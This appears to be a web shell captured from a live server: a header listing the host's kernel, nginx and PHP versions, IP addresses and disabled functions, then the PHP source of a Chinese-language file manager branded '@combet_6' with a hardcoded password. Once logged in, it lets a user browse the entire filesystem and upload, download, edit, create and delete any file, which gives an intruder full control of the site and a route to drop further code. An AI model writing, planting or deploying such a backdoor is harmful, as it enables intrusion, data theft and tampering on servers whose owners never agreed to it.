Uname:
Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software:
nginx/1.22.1
PHP version:
7.3.31 [ PHP INFO ] PHP os:
Linux
Server Ip:
103.146.158.90
Your Ip:
216.73.216.141
User:
www (1000) | Group:
www (1000)
Safe Mode:
OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
<?php
session_start();
date_default_timezone_set('Asia/Shanghai');
header('Content-Type: text/html; charset=UTF-8');
// 设置密码
$password = 'qwe123';
if (isset($_POST['password'])) {
if ($_POST['password'] === $password) {
$_SESSION['loggedin'] = true;
} else {
echo "密码错误!";
}
}
if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true): ?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>登录</title>
</head>
<body>
<h1>登录</h1>
<form method="post">
<label for="password">密码:</label>
<input type="password" name="password" id="password">
<input type="submit" value="登录">
</form>
</body>
</html>
<?php
exit;
endif;
function get_root_directories() {
$drives = [];
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
foreach (range('A', 'Z') as $letter) {
$drive = $letter . ':\\';
if (is_dir($drive)) {
$drives[] = $drive;
}
}
} else {
$drives[] = '/';
}
return $drives;
}
$root = isset($_GET['dir']) ? realpath($_GET['dir']) : null;
if (!$root) {
$root_directories = get_root_directories();
} else {
$root_directories = [$root];
}
$current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : null;
if ($current_dir && strpos($current_dir, realpath($root)) !== 0) {
$current_dir = realpath($root);
}
if (isset($_FILES['files']) && $current_dir) {
$uploaded_files = $_FILES['files'];
$total_files = count($uploaded_files['name']);
$success_count = 0;
for ($i = 0; $i < $total_files; $i++) {
$upload_path = $current_dir . '/' . basename($uploaded_files['name'][$i]);
if (move_uploaded_file($uploaded_files['tmp_name'][$i], $upload_path)) {
$success_count++;
}
}
if ($success_count === $total_files) {
echo "所有文件上传成功!";
} else {
echo "部分文件上传失败!";
}
}
if (isset($_GET['delete'])) {
$file_to_delete = realpath($_GET['delete']);
if ($file_to_delete && strpos($file_to_delete, realpath($root)) === 0 && is_file($file_to_delete)) {
unlink($file_to_delete);
echo "文件删除成功!";
} else {
echo "文件删除失败!";
}
}
if (isset($_GET['download'])) {
$file_to_download = realpath($_GET['download']);
if ($file_to_download && strpos($file_to_download, realpath($root)) === 0 && is_file($file_to_download)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file_to_download) . '"');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file_to_download));
readfile($file_to_download);
exit;
} else {
echo "文件下载失败!";
}
}
if (isset($_POST['edit_file']) && isset($_POST['file_content'])) {
$file_to_edit = realpath($_POST['edit_file']);
if ($file_to_edit && strpos($file_to_edit, realpath($root)) === 0 && is_file($file_to_edit)) {
file_put_contents($file_to_edit, $_POST['file_content']);
echo "文件编辑成功!";
} else {
echo "文件编辑失败!";
}
}
if (isset($_POST['new_file_name']) && isset($_POST['new_file_content']) && $current_dir) {
$new_file_path = $current_dir . '/' . $_POST['new_file_name'];
if (!file_exists($new_file_path)) {
file_put_contents($new_file_path, $_POST['new_file_content']);
echo "文件创建成功!";
} else {
echo "文件已存在!";
}
}
if (isset($_POST['new_dir_name']) && $current_dir) {
$new_dir_path = $current_dir . '/' . $_POST['new_dir_name'];
if (!file_exists($new_dir_path)) {
mkdir($new_dir_path);
echo "目录创建成功!";
} else {
echo "目录已存在!";
}
}
$files = $current_dir ? scandir($current_dir) : [];
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>@combet_6</title>
</head>
<body>
<h1>@combet_6--<a href="?dir=<?php echo __DIR__; ?>">点击进入当前文件目录</a></h1>
<?php if ($current_dir): ?>
<h2>当前目录: <?php echo $current_dir; ?></h2>
<ul>
<li><a href="?dir=<?php echo dirname($current_dir); ?>">.. (返回上级目录)</a></li>
<?php foreach ($files as $file): ?>
<?php if ($file == '.' || $file == '..') continue; ?>
<?php $file_path = $current_dir . '/' . $file; ?>
<li>
<?php if (is_dir($file_path)): ?>
<a href="?dir=<?php echo $file_path; ?>"><?php echo $file; ?>/</a>
<?php else: ?>
<?php echo $file; ?> (<?php echo date("Y-m-d H:i:s", filemtime($file_path)); ?>)
<a href="?download=<?php echo $file_path; ?>&dir=<?php echo $current_dir; ?>">下载</a>
<a href="?delete=<?php echo $file_path; ?>&dir=<?php echo $current_dir; ?>" onclick="return confirm('确定删除该文件吗?')">删除</a>
<a href="?edit=<?php echo $file_path; ?>&dir=<?php echo $current_dir; ?>">编辑</a>
<?php endif; ?>
</li>
<?php endforeach; ?>
</ul>
<h2>上传文件</h2>
<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<input type="submit" value="上传">
</form>
<h2>创建新文件</h2>
<a href="?create_new=1&dir=<?php echo $current_dir; ?>">创建文件</a>
<h2>创建新目录</h2>
<form method="post">
<input type="hidden" name="dir" value="<?php echo $current_dir; ?>">
<label for="new_dir_name">目录名:</label>
<input type="text" name="new_dir_name" value="new_directory">
<br>
<input type="submit" value="创建">
</form>
<?php else: ?>
<h2>选择一个盘符</h2>
<ul>
<?php foreach ($root_directories as $drive): ?>
<li><a href="?dir=<?php echo $drive; ?>"><?php echo $drive; ?></a></li>
<?php endforeach; ?>
</ul>
<?php endif; ?>
<?php if (isset($_GET['edit']) && is_file($_GET['edit'])): ?>
<?php $file_to_edit = realpath($_GET['edit']); ?>
<?php if ($file_to_edit && strpos($file_to_edit, realpath($root)) === 0): ?>
<h2>编辑文件: <?php echo basename($file_to_edit); ?></h2>
<form method="post">
<input type="hidden" name="edit_file" value="<?php echo $file_to_edit; ?>">
<input type="hidden" name="dir" value="<?php echo $current_dir; ?>">
<textarea name="file_content" rows="20" cols="80"><?php echo htmlspecialchars(file_get_contents($file_to_edit)); ?></textarea>
<br>
<input type="submit" value="保存">
</form>
<br>
<a href="?dir=<?php echo $current_dir; ?>">返回</a>
<?php endif; ?>
<?php endif; ?>
<?php if (isset($_GET['create_new']) && $_GET['create_new'] == 1): ?>
<h2>创建新文件</h2>
<form method="post">
<input type="hidden" name="dir" value="<?php echo $current_dir; ?>">
<label for="new_file_name">文件名:</label>
<input type="text" name="new_file_name" value="new.txt">
<br>
<label for="new_file_content">内容:</label>
<textarea name="new_file_content" rows="20" cols="80"></textarea>
<br>
<input type="submit" value="创建">
</form>
<br>
<a href="?dir=<?php echo $current_dir; ?>">返回</a>
<?php endif; ?>
</body>
</html>